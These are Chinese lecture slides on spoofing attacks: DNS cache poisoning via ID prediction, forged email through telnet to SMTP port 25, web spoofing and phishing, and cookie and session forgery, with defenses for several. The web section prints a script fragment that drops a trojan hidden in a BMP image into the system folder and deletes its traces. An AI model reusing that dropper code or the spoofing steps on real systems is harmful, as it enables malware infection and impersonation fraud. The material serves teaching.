版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡介
網(wǎng)絡(luò)安全
劉敏賢副教授西南科技大學(xué)計(jì)算機(jī)科學(xué)與技術(shù)學(xué)院第5章緩沖區(qū)溢出攻擊回顧緩沖區(qū)溢出攻擊的基本原理、方法緩沖區(qū)溢出程序的原理及要素攻擊UNIX攻擊WINDOWS第7章欺騙攻擊欺騙攻擊是網(wǎng)絡(luò)攻擊的一種重要手段。常見的欺騙攻擊方式有:DNS欺騙攻擊;Email欺騙攻擊;Web欺騙攻擊和IP欺騙攻擊等。本章介紹這些主要欺騙攻擊的原理、實(shí)現(xiàn)技術(shù)。第7章欺騙攻擊7.1DNS欺騙攻擊7.2Email欺騙攻擊7.3Web欺騙攻擊7.4IP欺騙攻擊2024/8/145概述在Internet上計(jì)算機(jī)之間相互進(jìn)行的交流建立在兩個(gè)前提之下:認(rèn)證(Authentication)信任(Trust)2024/8/146概述認(rèn)證:
認(rèn)證是網(wǎng)絡(luò)上的計(jì)算機(jī)用于相互間進(jìn)行識(shí)別的一種鑒別過程,經(jīng)過認(rèn)證的過程,獲準(zhǔn)相互交流的計(jì)算機(jī)之間就會(huì)建立起相互信任的關(guān)系。2024/8/147概述信任:
信任和認(rèn)證具有逆反關(guān)系,即如果計(jì)算機(jī)之間存在高度的信任關(guān)系,則交流時(shí)就不會(huì)要求嚴(yán)格的認(rèn)證。而反之,如果計(jì)算機(jī)之間沒有很好的信任關(guān)系,則會(huì)進(jìn)行嚴(yán)格的認(rèn)證。2024/8/148概述欺騙實(shí)質(zhì)上就是一種冒充身份通過認(rèn)證騙取信任的攻擊方式。攻擊者針對(duì)認(rèn)證機(jī)制的缺陷,將自己偽裝成可信任方,從而與受害者進(jìn)行交流,最終攫取信息或是展開進(jìn)一步攻擊。2024/8/149概述目前比較流行的欺騙攻擊主要有5種:IP欺騙:使用其他計(jì)算機(jī)的IP來騙取連接,獲得信息或者得到特權(quán);電子郵件欺騙:電子郵件發(fā)送方地址的欺騙;DNS欺騙:域名與IP地址轉(zhuǎn)換過程中實(shí)現(xiàn)的欺騙;Web欺騙:創(chuàng)造某個(gè)萬維網(wǎng)網(wǎng)站的復(fù)制影像,從而達(dá)到欺騙網(wǎng)站用戶目的的攻擊。 DNS欺騙攻擊DNS欺騙原理假設(shè)當(dāng)提交給某個(gè)域名服務(wù)器的域名解析請(qǐng)求的數(shù)據(jù)包被截獲,然后按截獲者的意圖將一個(gè)虛假的IP地址作為應(yīng)答信息返回給請(qǐng)求者,這時(shí),原始請(qǐng)求者就會(huì)把這個(gè)虛假的IP地址作為它所要請(qǐng)求的域名而進(jìn)行連接,顯然它被欺騙到了別處而根本連接不上自己想要連接的那個(gè)域名
對(duì)那個(gè)客戶想要連接的域名而言,它就算是被黑掉了,因?yàn)榭蛻粲捎跓o法得到它的正確的IP地址而無法連接上它第7章第1節(jié)2024/8/1411DNS工作原理DNS的全稱是DomainNameServer即域名服務(wù)器,當(dāng)一臺(tái)主機(jī)發(fā)送一個(gè)請(qǐng)求要求解析某個(gè)域名時(shí),它會(huì)首先把解析請(qǐng)求發(fā)到自己的DNS服務(wù)器上。DNS的功能是提供主機(jī)名字和IP地址之間的轉(zhuǎn)換信息。DNS服務(wù)器里有一個(gè)“DNS緩存表”,里面存儲(chǔ)了此DNS服務(wù)器所管轄域內(nèi)主機(jī)的域名和IP地址的對(duì)應(yīng)關(guān)系。2024/8/1412DNS工作原理DNS解析出IP的過程(1)DNS解析出IP的過程(2)2024/8/1415DNS工作原理
上圖中有三臺(tái)主機(jī):客戶主機(jī)、域DNS服務(wù)器和域DNS服務(wù)器。其中域DNS服務(wù)器直接為客戶主機(jī)提供DNS服務(wù)。下面對(duì)這四個(gè)過程進(jìn)行解釋。
2024/8/1416DNS域名解析過程2024/8/1417DNS域名解析過程(2)2024/8/1418DNS欺騙的原理及實(shí)現(xiàn)步驟當(dāng)客戶主機(jī)向本地DNS服務(wù)器查詢域名的時(shí)候,如果服務(wù)器的緩存中已經(jīng)有相應(yīng)記錄,DNS服務(wù)器就不會(huì)再向其他服務(wù)器進(jìn)行查詢,而是直接將這條記錄返回給用戶。而入侵者欲實(shí)現(xiàn)DNS欺騙,關(guān)鍵的一個(gè)條件就是在DNS服務(wù)器的本地Cache中緩存一條偽造的解析記錄。2024/8/1419DNS欺騙的原理及實(shí)現(xiàn)步驟2024/8/1420DNS欺騙的原理及實(shí)現(xiàn)步驟2024/8/1421DNS欺騙的原理及實(shí)現(xiàn)步驟有了對(duì)DNS服務(wù)器進(jìn)行欺騙的可能,攻擊者怎樣偽造DNS應(yīng)答信息就成了問題的焦點(diǎn)。目前有兩種可能情況下的實(shí)現(xiàn)辦法:攻擊者可以控制本地的域名服務(wù)器攻擊者無法控制任何DNS服務(wù)器2024/8/1422第一種可能情況2024/8/1423第一種可能情況(2)2024/8/1424第二種可能情況另一種更現(xiàn)實(shí)的情況,就是攻擊者無法控制任何DNS服務(wù)器,但他可以控制該服務(wù)所在網(wǎng)絡(luò)的某臺(tái)主機(jī),并可以監(jiān)聽該網(wǎng)絡(luò)中的通信情況。這時(shí)候,黑客要對(duì)遠(yuǎn)程的某個(gè)DNS服務(wù)器進(jìn)行欺騙攻擊,所采用的手段很像IP欺騙攻擊:首先,黑客要冒充某個(gè)域名服務(wù)器的IP地址;其次,黑客要能預(yù)測(cè)目標(biāo)域名服務(wù)器所發(fā)送DNS數(shù)據(jù)包的ID號(hào)。確定目標(biāo)DNS服務(wù)器的ID號(hào)即為DNS欺騙攻擊的關(guān)鍵所在2024/8/1425第二種可能情況(2)DNS數(shù)據(jù)是通過UDP協(xié)議傳遞的,在DNS服務(wù)器之間進(jìn)行域名解析通信時(shí),請(qǐng)求方和應(yīng)答方都使用UDP53端口,而這樣的通信過程往往是并行的,也就是說,DNS域名服務(wù)器之間同時(shí)可能會(huì)進(jìn)行多個(gè)解析過程,既然不同的過程使用相同的端口號(hào),那靠什么來彼此區(qū)別呢?答案就在DNS報(bào)文里面。DNS報(bào)文格式頭部的ID域,是用于區(qū)別不同會(huì)話過程的,這有點(diǎn)類似于TCP中的序列號(hào),域名解析的請(qǐng)求方和應(yīng)答方只有使用相同的ID號(hào)才能證明是同一個(gè)會(huì)話(由請(qǐng)求方?jīng)Q定所使用的ID)。不同的解析會(huì)話,采用不同的ID號(hào)。2024/8/1426第二種可能情況(3)在一段時(shí)期內(nèi),DNS服務(wù)器一般都采用一種有章可循的ID生成機(jī)制,例如,對(duì)于每次發(fā)送的域名解析請(qǐng)求,依次將數(shù)據(jù)包中的ID加1。如此一來,攻擊者如果可以在某個(gè)DNS服務(wù)器的網(wǎng)絡(luò)中進(jìn)行嗅探,他只要向遠(yuǎn)程的DNS服務(wù)器發(fā)送一個(gè)對(duì)本地某域名的解析請(qǐng)求,通過嗅探得到的來自目標(biāo)DNS服務(wù)器的請(qǐng)求數(shù)據(jù)包(因?yàn)檫h(yuǎn)程DNS服務(wù)器肯定會(huì)轉(zhuǎn)而請(qǐng)求本地的DNS服務(wù)器),攻擊者就可以得到想要的ID號(hào)了。2024/8/1427第二種可能情況(4)例子:
域的DNS服務(wù)器向域的DNS服務(wù)器請(qǐng)求解析,如果攻擊者所偽造的DNS應(yīng)答包中含有正確的ID號(hào),并且搶在域的DNS服務(wù)器之前向域的DNS服務(wù)器返回偽造信息,欺騙攻擊就將獲得成功的。2024/8/1428第二種可能情況(5)其實(shí),即使攻擊者無法監(jiān)聽某個(gè)擁有DNS服務(wù)器的網(wǎng)絡(luò),也有辦法得到目標(biāo)DNS服務(wù)器的ID號(hào)。首先,他向目標(biāo)DNS服務(wù)器請(qǐng)求對(duì)某個(gè)不存在域名地址(但該域是存在的)進(jìn)行解析。然后,攻擊者冒充所請(qǐng)求域的DNS服務(wù)器,向目標(biāo)DNS服務(wù)器連續(xù)發(fā)送應(yīng)答包,這些包中的ID號(hào)依次遞增。過一段時(shí)間,攻擊者再次向目標(biāo)DNS服務(wù)器發(fā)送針對(duì)該域名的解析請(qǐng)求,如果得到返回結(jié)果,就說明目標(biāo)DNS服務(wù)器接受了剛才黑客的偽造應(yīng)答,繼而說明黑客猜測(cè)的ID號(hào)在正確的區(qū)段上,否則,攻者可以再次嘗試。2024/8/1429第二種可能情況(6)實(shí)際攻擊中,第二種攻擊方法實(shí)現(xiàn)比較復(fù)雜。知道了ID號(hào),并且知道了ID號(hào)的增長規(guī)律,以下的過程類似于IP欺騙攻擊。2024/8/1430一次DNS欺騙攻擊的完整過程2024/8/1431DNS欺騙的局限性及防御2024/8/1432DNS欺騙的局限性及防御在配置DNS服務(wù)器的時(shí)候注意:使用最新版本DNS服務(wù)器軟件并及時(shí)安裝補(bǔ)??;關(guān)閉DNS服務(wù)器的遞歸功能:DNS服務(wù)器利用緩存中的記錄信息回答查詢請(qǐng)求或是DNS服務(wù)器通過查詢其它服務(wù)器獲得查詢信息并將它發(fā)送給客戶機(jī),這兩種查詢方式稱為遞歸查詢,這種查詢方式容易導(dǎo)致DNS欺騙。限制區(qū)域傳輸范圍:限制域名服務(wù)器做出響應(yīng)的地址、限制域名服務(wù)器做出響應(yīng)的遞歸請(qǐng)求地址、限制發(fā)出請(qǐng)求的地址;限制動(dòng)態(tài)更新;采用分層的DNS體系結(jié)構(gòu)。Email欺騙攻擊Email欺騙方法攻擊者佯稱自己為系統(tǒng)管理員(郵件地址和系統(tǒng)管理員完全相同),給用戶發(fā)送郵件要求用戶修改口令(口令可能為指定字符串)或在貌似正常的附件中加載病毒或其他木馬程序
第7章第2節(jié)Email欺騙攻擊Email欺騙實(shí)現(xiàn)步驟SMTP服務(wù)器允許匿名登錄填寫假的名稱和發(fā)信人地址使用web形式騙取密碼,或者使用附件植入木馬第7章第2節(jié)2024/8/1435電子郵件欺騙及防御技術(shù)電子郵件欺騙的原理電子郵件欺騙的防御2024/8/1436電子郵件欺騙的原理攻擊者使用電子郵件欺騙有三個(gè)目的:第一,隱藏自己的身份。第二,如果攻擊者想冒充別人,他能假冒那個(gè)人的電子郵件。第三,電子郵件欺騙能被看作是社會(huì)工程的一種表現(xiàn)形式。電子郵件欺騙的原理一個(gè)郵件系統(tǒng)的傳輸包含用戶代理(UserAgent)、傳輸代理(TransferAgent)及投遞代理(DeliveryAgent)三大部分。用戶代理是一個(gè)用戶端發(fā)信和收信的程序,負(fù)責(zé)將信件按照一定的標(biāo)準(zhǔn)包裝,然后送到郵件服務(wù)器,將信件發(fā)出或由郵件服務(wù)器收回。傳輸代理則負(fù)責(zé)信件的交換和傳輸,將信件傳送至適當(dāng)?shù)泥]件服務(wù)器。再由投遞代理將信件分發(fā)至最終用戶的郵箱。在正常的情況下,郵件會(huì)盡量將發(fā)送者的名字和地址包括進(jìn)郵件頭信息中,但是,有時(shí)候,發(fā)送者希望將郵件發(fā)送出去而不希望收件者知道是誰發(fā)的,這種發(fā)送郵件的方法稱為匿名郵件。實(shí)現(xiàn)匿名的一種最簡單的方法,是簡單地改變電子郵件軟件里的發(fā)送者的名字,但通過郵件頭的其它信息,仍能夠跟蹤發(fā)送者。另一種比較徹底的匿名方式是讓其他人發(fā)送這個(gè)郵件,郵件中的發(fā)信地址就變成了轉(zhuǎn)發(fā)者的地址了。現(xiàn)在因特網(wǎng)上有大量的匿名轉(zhuǎn)發(fā)者(或稱為匿名服務(wù)器)。2024/8/1438電子郵件欺騙的原理執(zhí)行電子郵件欺騙有三種基本方法,每一種有不同難度級(jí)別,執(zhí)行不同層次的隱蔽。它們分別是:利用相似的電子郵件地址直接使用偽造的E-mail地址遠(yuǎn)程登錄到SMTP端口發(fā)送郵件2024/8/1439利用相似的電子郵件地址這主要是利用人們的大意心理。攻擊者找到一個(gè)受害者熟悉的名字。有了這個(gè)名字后,攻擊者注冊(cè)一個(gè)看上去像受害者熟悉的名字的郵件地址。這樣收信人很可能會(huì)回復(fù)這個(gè)郵箱發(fā)來信,這樣攻擊者就有得到想要信息的可能性。2024/8/1440直接使用偽造的Email地址SMTP協(xié)議(即簡單郵件傳輸協(xié)議)有著一個(gè)致命的缺陷:它所遵循過于信任的原則,沒有設(shè)計(jì)身份驗(yàn)證系統(tǒng)。SMTP建立在假定人們的身份和他們所聲稱一致的基礎(chǔ)之上,沒有對(duì)郵件發(fā)送者的身份進(jìn)行驗(yàn)證。這使得人們可以隨意構(gòu)造發(fā)件人地址來發(fā)送郵件。下頁我們通過修改郵件客戶端軟件的設(shè)置來示例這一點(diǎn)。2024/8/1441直接使用偽造的Email地址
對(duì)于那些沒有設(shè)置SMTP身份驗(yàn)證功能的郵件服務(wù)器,例如右圖所示的Outlook郵件客戶軟件就不需要做相應(yīng)的設(shè)置,當(dāng)用戶使用郵件客戶軟件發(fā)出電子郵件時(shí),發(fā)送郵件服務(wù)器不會(huì)對(duì)發(fā)件人地址進(jìn)行驗(yàn)證或者確認(rèn),因此攻擊者能夠隨意指定他想使用的所有地址,而這些地址當(dāng)然會(huì)作為郵件源出現(xiàn)在收件人的信中。2024/8/1442直接使用偽造的Email地址
此外,在右圖所示的例子中,攻擊者還能夠指定他想要的任何郵件返回地址。因此當(dāng)用戶回信時(shí),答復(fù)回到攻擊者所掌握的郵箱test@test,而不是回到被盜用了地址的人那里。2024/8/1443遠(yuǎn)程登錄到SMTP端口SMTP協(xié)議一般使用25號(hào)端口,郵件服務(wù)器通過它在互聯(lián)網(wǎng)上發(fā)送郵件。執(zhí)行電子郵件欺騙的一個(gè)比較復(fù)雜的方法是遠(yuǎn)程登錄到郵件服務(wù)器的25號(hào)端口發(fā)送郵件。2024/8/1444遠(yuǎn)程登錄到25號(hào)端口(2)攻擊者首先找到郵件服務(wù)器的IP地址,或者通過運(yùn)行端口掃描程序來判斷哪些機(jī)器是25號(hào)端口開放的郵件服務(wù)器。在攻擊者有了一臺(tái)25號(hào)端口開放的機(jī)器和一臺(tái)正在運(yùn)行的郵件服務(wù)器后,輸入下面的命令:telnetIP地址
25在連接上以后,再輸入下面的內(nèi)容:
HELO MAILFROM:欺騙偽裝的mail地址
RCPTTO:收件的受害者mail地址
DATA
郵件的內(nèi)容2024/8/1445示例:遠(yuǎn)程登錄25端口的Email欺騙實(shí)驗(yàn)環(huán)境局域網(wǎng)mail服務(wù)器為50Mail服務(wù)器不需要身份驗(yàn)證內(nèi)有兩個(gè)用戶分別為:liuy@lan.nipcchensl@lan.nipc實(shí)驗(yàn)方式偽裝成liuy@lan.nipc給chensl@lan.nipc發(fā)郵件2024/8/1446Email欺騙過程—telnet到服務(wù)器通過telnet,連接到郵件服務(wù)器的25端口。在cmd.exe下使用的命令:
telnet5025結(jié)果如圖所示,說明已經(jīng)連接到了25端口2024/8/1447Email欺騙過程—發(fā)送郵件內(nèi)容220nipcoaMagicWinmailServer2.4(Build0530)ESMTPreadyhelo250nipcoaMagicWinmailServer2.4(Build0530)mailfrom:liuy@lan.nipc250okrcptto:chensl@lan.nipc250okdata354goaheadsubject:testto:chensl@lan.nipcfrom:liuy@lan.nipcthisisatest.250okmessageacceptedfordeliveryquit221nipcoaMagicWinmailServer2.4(Build0530)紅色部分是根據(jù)SMTP協(xié)議自行輸入的內(nèi)容;黑色部分是服務(wù)器的返回信息。說明2024/8/1448Email欺騙過程—發(fā)送郵件內(nèi)容截屏2024/8/1449Email欺騙過程—結(jié)果用戶chensl@lan.nipc將收到來自liuy@lan.nipc的郵件,如圖所示。但是liuy@lan.nipc并不知道自己發(fā)送了郵件。試想,如果郵件的內(nèi)容里有病毒或者其它惡意代碼,且chensl@lan.nipc信任liuy@lan.nipc,那么將會(huì)是一件多么危險(xiǎn)的事情啊。2024/8/14505.4.2電子郵件欺騙的防御做為互聯(lián)網(wǎng)用戶,必須時(shí)刻樹立風(fēng)險(xiǎn)意識(shí),不要隨意打開一個(gè)不可信任的郵件。此外,下面介紹幾種防范方法分別從這幾個(gè)方面入手:郵件接收者郵件發(fā)送者郵件服務(wù)器郵件加密2024/8/1451防范方法—郵件接收者做為郵件接收者來說,用戶需要合理配置郵件客戶端,使每次總能顯示出完整的電子郵件地址,而不是僅僅顯示別名,完整的電子郵件地址能提供一些跡象表明正在發(fā)生一些不平常的事情。用戶應(yīng)該注意檢驗(yàn)發(fā)件人字段,不要被相似的發(fā)信地址所蒙蔽。2024/8/1452防范方法—郵件發(fā)送者做為郵件發(fā)送者來說,如果你使用foxmail或者outlook之類的郵件客戶端,你必須保護(hù)好這些郵件客戶端,防止他人對(duì)客戶端的設(shè)置進(jìn)行修改。2024/8/1453防范方法—郵件服務(wù)器對(duì)于郵件服務(wù)器提供方來說,采用的SMTP身份驗(yàn)證機(jī)制。原來使用SMTP協(xié)議發(fā)送郵件的時(shí)候并不需要任何驗(yàn)證,身份欺騙極易實(shí)現(xiàn)。現(xiàn)在將POP協(xié)議收取郵件需要用戶名/密碼驗(yàn)證的思想移至到SMTP協(xié)議,發(fā)送郵件也需要類似的驗(yàn)證。絕大多數(shù)郵件服務(wù)提供商都是采用的這種做法,通常是使用與接收郵件相同的用戶名和密碼來發(fā)送郵件。采用這種方法之后,雖然SMTP協(xié)議安全性的問題仍然無法從根本上得到解決,但是電子郵件欺騙已經(jīng)變得不像過去那么容易了。2024/8/1454防范方法—PGP加密還有一種可能的解決方法是使用公鑰加密,其中應(yīng)用最廣泛的就是PGP郵件加密。PGP(PrettyGoodPrivacy)是一個(gè)可以讓您的電子郵件擁有保密功能的程序。藉此你可以將你的郵件加密,一旦加密后,郵件看起來是一堆無意義的亂碼。PGP提供了極強(qiáng)的保護(hù)功能,即使是最先進(jìn)的解碼分析技術(shù)也無法解讀加密后的文字。PGP加密與解密不像其它傳統(tǒng)加密的方式,而是以公鑰密碼學(xué)為基礎(chǔ)的。2024/8/1455防范方法—PGP加密(2)舉例來說,當(dāng)你要傳送一封保密信或檔案給某人時(shí),必須先取得那人的公鑰(PublicKey),然后利用這個(gè)公鑰將信件加密。當(dāng)某人收到您加密的信件后,他必須利用相應(yīng)的私鑰(SecretKey)來解密。因此,除非其它人擁有收信者的私鑰,否則無法解開發(fā)信人所加密的信件。同時(shí),收信人在使用私鑰解密時(shí),還必須輸入通行碼,如此又對(duì)加密后的郵件多了一層保護(hù)。Email欺騙攻擊Email欺騙的防護(hù)查看郵件原文,檢查真正的發(fā)件服務(wù)器地址通過郵件鏈接網(wǎng)頁的時(shí)候,注意真正的網(wǎng)站地址在不同的應(yīng)用中,盡可能使用不相同的、無關(guān)的密碼第7章第2節(jié)Web欺騙攻擊第7章第3節(jié)Web欺騙攻擊Web欺騙方法改寫URLWeb中的腳本第7章第3節(jié)2024/8/1459Web欺騙的概念Web站點(diǎn)給用戶提供了豐富多彩的信息,Web頁面上的文字、圖畫與聲音可以給人深刻的印象。在計(jì)算機(jī)世界中,我們往往都習(xí)慣各類圖標(biāo)、圖形,代表各類不同的含義。人們往往還會(huì)在事件的時(shí)間先后順序中得到某種暗示。如果在單擊銀行的網(wǎng)頁時(shí)username對(duì)話框同時(shí)出現(xiàn)了,用戶自然會(huì)認(rèn)為應(yīng)該輸入在該銀行的賬戶與口令。如果你在單擊了一個(gè)文檔鏈接后,立即開始了下載,那么你很自然地會(huì)認(rèn)為該文件正從該站點(diǎn)下載。然而,以上的想法不一定總是正確的。Web欺騙的概念Web欺騙是一種電子信息欺騙,攻擊者創(chuàng)造了一個(gè)完整的令人信服的Web世界,但實(shí)際上它卻是一個(gè)虛假的復(fù)制。虛假的Web看起來十分逼真,它擁有相同的網(wǎng)頁和鏈接。然而攻擊者控制著這個(gè)虛假的Web站點(diǎn),這樣受害者的瀏覽器和Web之間的所有網(wǎng)絡(luò)通信就完全被攻擊者截獲。2024/8/1461Web欺騙的概念由于攻擊者可以觀察或者修改任何從受害者到Web服務(wù)器的信息,同樣地,也控制著從Web服務(wù)器發(fā)至受害者的返回?cái)?shù)據(jù),這樣攻擊者就有發(fā)起攻擊的可能性。攻擊者能夠監(jiān)視被攻擊者的網(wǎng)絡(luò)信息,記錄他們?cè)L問的網(wǎng)頁和內(nèi)容。當(dāng)被攻擊者填完一個(gè)表單并發(fā)送后,這些數(shù)據(jù)將被傳送到Web服務(wù)器,Web服務(wù)器將返回必要的信息,但不幸的是,攻擊者完全可以截獲并使用這些信息。2024/8/1462Web欺騙的概念在得到必要的數(shù)據(jù)后,攻擊者可以通過修改受害者和Web服務(wù)器兩方任何一方數(shù)據(jù),來進(jìn)行破壞活動(dòng)。攻擊者可以修改受害者的確認(rèn)數(shù)據(jù),攻擊者還可以修改Web服務(wù)器返回的數(shù)據(jù)。2024/8/1463Web欺騙的工作原理Web欺騙能夠成功的關(guān)鍵是在受害者和真實(shí)Web服務(wù)器之間插入攻擊者的Web服務(wù)器,這種攻擊常被稱為“中間人攻擊(man-in-the-middle)”。2024/8/1464Web欺騙的工作原理2024/8/1465Web欺騙的工作原理2024/8/1466Web欺騙的工作原理Web欺騙攻擊改寫URL①emailwithhtmllinksseemslikeMicrosoft①②③④④htmlpagewithlinkslike:⑤第7章第3節(jié)Web欺騙攻擊利用Web腳本進(jìn)行欺騙原理攻擊者設(shè)計(jì)一個(gè)網(wǎng)頁,并誘使受害者瀏覽該網(wǎng)頁該網(wǎng)頁中包含有一個(gè)圖片和一個(gè)腳本當(dāng)瀏覽時(shí),該圖片被下載到受害者計(jì)算機(jī)的臨時(shí)目錄中,而腳本被運(yùn)行腳本的功能是將圖片中隱藏的木馬提取出來,并設(shè)置為自動(dòng)執(zhí)行第7章第3節(jié)Web欺騙攻擊利用Web腳本進(jìn)行欺騙基本控件a1=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();reg=a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");a1.createInstance();FSO=a1.GetObject();第7章第3節(jié)Web欺騙攻擊Web腳本從BMP圖片中釋放程序setLt=FSO.CreateTextFile(path&"tmp.in")Lt.WriteLine("rbx")Lt.WriteLine("0")Lt.WriteLine("rcx")Lt.WriteLine("1000")Lt.WriteLine("w136")Lt.WriteLine("q")Lt.Close第7章第3節(jié)Web欺騙攻擊Web腳本從BMP圖片中釋放程序WSH.Run"command/cdebug"&path&"tmp.dat<"&path&"tmp.in>"&path&"tmp.out",false,6OnErrorResumeNextFSO.GetFile(path&"tmp.dat").Copy(winsys&"tmp.exe")FSO.GetFile(path&"tmp.dat").DeleteFSO.GetFile(path&"tmp.in").DeleteFSO.GetFile(path&"tmp.out").Delete第7章第3節(jié)Web欺騙攻擊其它Web攻擊網(wǎng)頁病毒、木馬(及時(shí)升級(jí)補(bǔ)丁、使用安全級(jí)別高的瀏覽器)HTTP劫持(網(wǎng)絡(luò)整體防護(hù))網(wǎng)絡(luò)釣魚第7章第3節(jié)2024/8/1473Web欺騙案例網(wǎng)絡(luò)釣魚很多人是聞其名而色變,因?yàn)樗?jīng)常扮演成一只幕后黑手伸向人們的口袋……確切地講,網(wǎng)絡(luò)釣魚就是那些黑客們借用電子郵件或是模仿網(wǎng)上銀行、網(wǎng)上購物等一切網(wǎng)上交易的頁面而制作出假的網(wǎng)頁頁面,以假亂真,讓用戶在毫不知情的情況下泄露出自己的相關(guān)賬戶信息(賬號(hào)、密碼),一旦這些黑客們得到了用戶的賬號(hào)信息,后果可想而知。經(jīng)典案例:工商銀行網(wǎng)上銀行被黑客多次偽造2024/8/14網(wǎng)絡(luò)入侵與防范講義742005年1月,一個(gè)假冒中國工商銀行網(wǎng)站出現(xiàn)在互聯(lián)網(wǎng)上,誘騙銀行卡持有人的帳戶和密碼,并導(dǎo)致多人的銀行存款被盜,直接經(jīng)濟(jì)損失達(dá)80萬元人民幣。網(wǎng)絡(luò)釣魚喬裝銀行,眾網(wǎng)友自動(dòng)上鉤2024/8/14網(wǎng)絡(luò)入侵與防范講義75工商銀行網(wǎng)站被仿造又一例URL露出了馬腳針對(duì)于站點(diǎn)的欺騙攻擊技術(shù)cookies欺騙攻擊session欺騙攻擊cookies欺騙原理什么是cookies?因特網(wǎng)瀏覽器的記錄標(biāo)記cookies的作用?Cookies是一種能夠讓網(wǎng)站服務(wù)器把少量數(shù)據(jù)儲(chǔ)存到客戶端的硬盤或內(nèi)存,或是從客戶端的硬盤讀取數(shù)據(jù)的一種技術(shù)。Cookies是當(dāng)你瀏覽某網(wǎng)站時(shí),由Web服務(wù)器置于你硬盤上的一個(gè)非常小的文本文件,它可以記錄你的用戶ID、密碼、瀏覽過的網(wǎng)頁、停留的時(shí)間等信息。當(dāng)你再次來到該網(wǎng)站時(shí),網(wǎng)站通過讀取Cookies,得知你的相關(guān)信息,就可以做出相應(yīng)的動(dòng)作,如在頁面顯示歡迎你的標(biāo)語,或者讓你不用輸入ID、密碼就直接登錄等等。cookies欺騙原理cont.Cookies在哪里?Cookies文件的存放位置為C:\DocumentsandSettings\用戶\CookiesCookies的格式?你的用戶名@產(chǎn)生的COOKIE的網(wǎng)頁文件所在的WEB目錄[COOKIE改變的次數(shù)].txt什么是Cookies欺騙?Cookies欺騙,就是在只對(duì)用戶做Cookies驗(yàn)證的系統(tǒng)中,通過修改Cookies的內(nèi)容來得到相應(yīng)的用戶權(quán)限登錄。cookies欺騙攻擊實(shí)現(xiàn)方法一般思路如下:
尋找具有Cookies欺騙漏洞的站點(diǎn)注冊(cè)用戶并登陸保存自己的Cookies
偷取其他用戶的Cookies
修改自己的Cookies等于或大致等于其
他用戶的Cookies
刷新頁面,更換身份驗(yàn)證身份session欺騙原理什么是session?Session是指一個(gè)終端用戶與交互系統(tǒng)進(jìn)行通信的時(shí)間間隔,通常指從注冊(cè)進(jìn)入系統(tǒng)到注銷退出系統(tǒng)之間所經(jīng)過的時(shí)間。具體到Web中的Session指的就是用戶在瀏覽某個(gè)網(wǎng)站時(shí),從進(jìn)入網(wǎng)站到瀏覽器關(guān)閉所經(jīng)過的這段時(shí)間,也就是用戶瀏覽這個(gè)網(wǎng)站所花費(fèi)的時(shí)間。從上述的定義中我們可以看到,Session實(shí)際上是一個(gè)特定的時(shí)間概念.
說白了也就是當(dāng)一個(gè)訪問者來到你的網(wǎng)站的時(shí)候一個(gè)Session就開始了,當(dāng)他離開的時(shí)候Session就結(jié)束了。session欺騙原理cont.session工作原理:web服務(wù)器能通過Session對(duì)象區(qū)分不同的瀏覽器,因?yàn)镾ession對(duì)象是用來記錄瀏覽器端的變量,存儲(chǔ)一些如用戶名等比較敏感或有用的信息。這點(diǎn)似乎和Cookie有點(diǎn)像。但我們知道Cookie的值都是保存在客戶端的,而Session的值卻是保存在服務(wù)器端。當(dāng)每個(gè)訪問者第一次瀏覽器訪問服務(wù)器的一個(gè)ASP網(wǎng)頁的時(shí)候,服務(wù)器會(huì)為他創(chuàng)建一個(gè)新的并且獨(dú)立的Session對(duì)象,分配給該會(huì)話一個(gè)會(huì)話標(biāo)識(shí)號(hào),并把包含會(huì)話標(biāo)識(shí)符的特殊加密版本的一個(gè)Cookie(會(huì)話標(biāo)識(shí)號(hào))發(fā)送給客戶,當(dāng)瀏覽器關(guān)閉時(shí),這個(gè)會(huì)話標(biāo)識(shí)號(hào)也就消失了。什么是Session欺騙所謂Session欺騙,就是在只對(duì)用戶做Session驗(yàn)證的系統(tǒng)中,通過偽造Session的內(nèi)容來得到相應(yīng)的用戶權(quán)限登錄操作。session欺騙原理cont.session和cookies的區(qū)別:1.保存位置不同:Cookie是保存在客戶端。Session保存在服務(wù)器端。2.保存時(shí)間不同:Cookie可以保存在用戶電腦上一年,或者更長的時(shí)間Session往往只能保存幾十分鐘3.失效方式不同:Cookie設(shè)定時(shí)間后,會(huì)一直保存用戶的電腦上哪怕用
戶關(guān)機(jī)。Session保存服務(wù)器的內(nèi)存中,只要服務(wù)器重啟,或者網(wǎng)站關(guān)閉,都會(huì)丟失。兩者之間的關(guān)系,兩個(gè)都是用來保存用戶的信息。但是Session是基于Cookie基礎(chǔ)上的。如果用戶的瀏覽器禁止Cookie后,Session也是不能使用的session欺騙原理cont.Session驗(yàn)證的一般步驟:登錄頁面輸入賬號(hào)密碼后,如果有你輸入賬號(hào)密碼就認(rèn)為你是管理員,然后給你一個(gè)表示你身份的session值或者其他方法的驗(yàn)證,接著跟上面一樣給你個(gè)表示你身份的sesion值,隨后你進(jìn)入任何一個(gè)管理頁面它都要首先驗(yàn)證你的session值.Session欺騙,必須有三個(gè)前提:1.進(jìn)行欺騙的網(wǎng)頁和被欺騙的網(wǎng)頁必須位于同一個(gè)網(wǎng)站內(nèi)
2.必須知道管理頁面。
3.必須知道Session變量以及它的限制條件。session欺騙原理cont.session欺騙攻擊思路:已有某網(wǎng)站,下有登錄頁:Login.asp,成功登錄后轉(zhuǎn)向可以看到敏感信息的ok.asp(設(shè)有訪問限制,驗(yàn)證通過則顯示),否則轉(zhuǎn)向Fail.asp。黑客先構(gòu)造一個(gè)hack.asp的網(wǎng)頁,通過瀏覽該網(wǎng)頁,建立Session會(huì)話,并設(shè)置一下Session驗(yàn)證時(shí)所需要的值,然后直接訪問登錄以后的網(wǎng)頁ok.asp,由于ok.asp是通過Session來驗(yàn)證的,成功繞過用戶名和密碼驗(yàn)證.
如果ok.asp和hack.asp不在同一臺(tái)服務(wù)器上,這種攻擊是否可行?Session欺騙,必須有三個(gè)前提:1.進(jìn)行欺騙的網(wǎng)頁和被欺騙的網(wǎng)頁必須位于同一個(gè)網(wǎng)站內(nèi)
2.必須知道后臺(tái)管理登陸頁面
